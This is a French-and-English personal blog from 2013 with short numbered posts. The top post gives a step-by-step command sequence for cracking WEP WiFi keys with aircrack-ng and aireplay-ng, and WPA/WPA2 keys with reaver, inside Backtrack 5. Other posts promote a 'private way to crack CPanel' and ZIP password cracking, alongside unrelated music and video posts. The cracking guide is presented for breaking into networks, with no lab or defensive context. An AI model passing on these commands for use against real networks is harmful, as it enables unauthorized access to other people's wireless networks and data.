dimanche 21 juillet 2013

*156* Hack WIFI (werless) -wep, wpa and wpa2 -:

Vous avez besoin de Systeme d'exploitation Backtrack 5 R3 et une machine virtuel comme virtuel box pour le windows et parallel desktop pour le mac.
L'instalation de backtrack sur une machine virtuel est tres disponible sur youtube et nous vous proposons la methode dans le video en bas.
*Pour cracker un wifi WEP:

2-n :root pw : toor
*shell 1(Terminal) :
= /etc/init.d/networking start
= airmon-ng
= airmon-ng stop wlan0
= airmon-ng start wlan0
= airmon-ng
= airodump-ng mon0
+ ctrl c (to stop it) 
= airodump-ng -w wep –c (channel number) --bssid (bssid number) mon0
*shell 2 :
= aireplay-ng -1 0 –a (bssid no) mon0
*shell 3 :
= aireplay-ng -3 –b (bssid number) mon0
Run until data is superior of 60000
Comeback to : 
*shell 1 :
= ctrl c (to stop it) 
= dir
NB:ouvrir le fichier .cap qui apparut au bureau et activer le.
=aircrack-ng (file name’’like: wep-01’’).cap

Key found:--------------------------
*Pour cracker un wifi WPA et WPA2 :
= /etc/init.d/networking start
= airmon-ng
= airmon-ng stop wlan0
= airmon-ng start wlan0
= airmon-ng
= airodump-ng mon0
+ ctrl c (to stop it) 
reaver -i mon0 -b 00:A1:B2:C3:D4:E5 –vv
attendre jusqu'à cent pour cent ,il safiche wpa psk :----------(password)

*155* Private way to crack CPanel

This is a professionnal way to crack CPanel,this is a effective and simple way, i use it all time and i decided to share this way  with you.
i'm shour you will like it

*154* Gnawa : Syndia

It's a wonderfull song of Gnawa style of his exelent songer HAMID ELKASRI, this musique style is considered as spiritual musique, this music have a millions of in all the world.
I waranti you that you will love it.

vendredi 1 mars 2013

*153* Have the ZIP folder password with fcrack in Backtrack 5 :

This video show's how to crack ZIP folder password using fcrack in Backtrack 5.
This way is so easy take down the ZIP folder password, and the best solution for this probleme.
It work 100%.

dimanche 13 janvier 2013

*152* Athelit but creazy...hhh...look what he do and where he practice

Look at this creazy french man...this athelit practic his sports in any where and every where
.....i saw this video and i can not stop to laught to the point my stomac hert me...
im shour you will love it

samedi 12 janvier 2013

*151* A beautifull short film show the reality wich the west gouvernement try to hide

For who don't know the the islamic culture...or who think the islam have any relation of science...whatch this video and think again.
Every thing we arive ti today are because muslims Scientist ...and this video show just some muslims invention to prove the point...and if you do some search i waranted you you will surprising about what you will find
Enjoy with the video ,it's realy beautiful , it's a Hollywood production.
Im shour you will love it. 

mardi 8 janvier 2013

*150* Video Mystic

Video Mystic

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